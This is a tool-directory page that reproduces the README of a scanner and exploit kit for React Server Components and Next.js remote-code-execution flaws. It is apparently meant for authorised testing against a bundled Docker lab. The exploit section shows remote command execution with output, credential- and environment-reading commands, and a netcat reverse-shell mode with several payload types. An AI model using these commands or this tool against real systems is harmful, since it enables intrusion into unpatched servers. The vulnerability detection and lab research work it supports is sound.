Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Indicator of Compromise (IOC) ManagementVulnerability ScannersExploitationWeb Application ExploitationThreat IntelligenceSubdomain EnumerationLearning & EducationPayload DevelopmentLabs & Practice
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

View Repository
2129 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

React2Shell Enterprise Scanner

High-fidelity vulnerability scanner for CVE-2025-55182 and CVE-2025-66478 - Remote Code Execution vulnerabilities in React Server Components / Next.js.

📖 For detailed technical analysis, exploit mechanics, and IOC data, see SECURITY-RESEARCH.md


⚠️ DISCLAIMER

This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING PURPOSES ONLY. Unauthorized access to computer systems is illegal. Only use these tools on systems you own or have explicit written permission to test. The authors assume no liability for misuse.


🚨 Vulnerability Overview

CVEDescriptionCVSS
CVE-2025-55182React Server Components Unsafe Deserialization RCE9.8 Critical
CVE-2025-66478Next.js Server Actions RCE9.8 Critical

Affected Packages:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Fixed Versions:

  • 19.0.1, 19.1.2, 19.2.1 (for all packages)

✨ Features

  • Multi-target input: Single URL, host files, CIDR ranges, IP ranges
  • Subdomain enumeration: Auto-discover subdomains
  • Technology fingerprinting: Detect Next.js before testing
  • Safe detection mode: Side-channel detection without code execution
  • RCE verification: Arithmetic-based proof of concept
  • IOC correlation: Check against known malicious infrastructure
  • Phoenix Security integration: Upload findings to Phoenix platform
  • Concurrent scanning: Multi-threaded for scale

📦 Installation

Using uv (recommended)

# No installation needed - uv handles dependencies
uv run react2shell-scanner -u https://example.com

Using pip

pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Usage

Basic Scanning

# Single URL
python3 react2shell-scanner -u https://example.com

# Safe mode (no RCE execution)
python3 react2shell-scanner -u https://example.com --safe-check

# From host file
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR range
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Multiple CIDR ranges
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Advanced Scanning

# Subdomain enumeration
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Custom subdomain wordlist
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Custom paths
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Skip fingerprinting (scan everything)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verbose with SSL disabled
python3 react2shell-scanner -u https://example.com -k -v

Phoenix Security Integration

# Upload findings to Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Debug mode (save payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Upload all results (not just vulnerabilities)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Configuration

Phoenix Security Config

Create .phoenix.config:

[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

Or use environment variables:

export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Test Lab

A Docker-based test environment is included. See Lab-instructions-sample.md for quick reference.

# Start lab
cd test-lab/lab
docker-compose up -d

# Services:
# - Vulnerable: http://localhost:3011
# - Patched:    http://localhost:3012

# Test vulnerable instance (safe evidence collection)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Test patched instance  
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Run full demo
./test-and-demo.sh --full-demo

⚠️ Note: Exploitation commands (e.g., exploit.py -c "whoami") trigger ACTUAL RCE. Use only on local Docker containers for research purposes.

💻 Exploit Tool (exploit.py)

Execute commands on vulnerable targets. Requires Python 3.11+

Installation

cd test-lab
pip3.11 install -r requirements.txt
# Or: pip3.11 install rich-click fake-useragent rich requests

Command Execution Examples

# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Application reconnaissance
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Output: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Network information
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Process enumeration
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Reverse Shell (Advanced)

# Get Docker network gateway
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Start listener (in another terminal)
nc -lvnp 4444

# Launch reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Available payload types: nc, nc-mkfifo, sh, bash, perl

Exploit Options

OptionDescription
-u, --urlTarget URL (required)
-c, --cmdCommand to execute
-r, --reverseEnable reverse shell mode
-l, --lhostListener host for reverse shell
-p, --lportListener port for reverse shell
-P, --payloadPayload type: nc, nc-mkfifo, sh, bash, perl
--timeoutRequest timeout (default: 10s)

📊 Output Formats

Console Output

[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

JSON Output

{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 IOC Correlation

The scanner includes known Indicators of Compromise from active exploitation campaigns:

Download Tool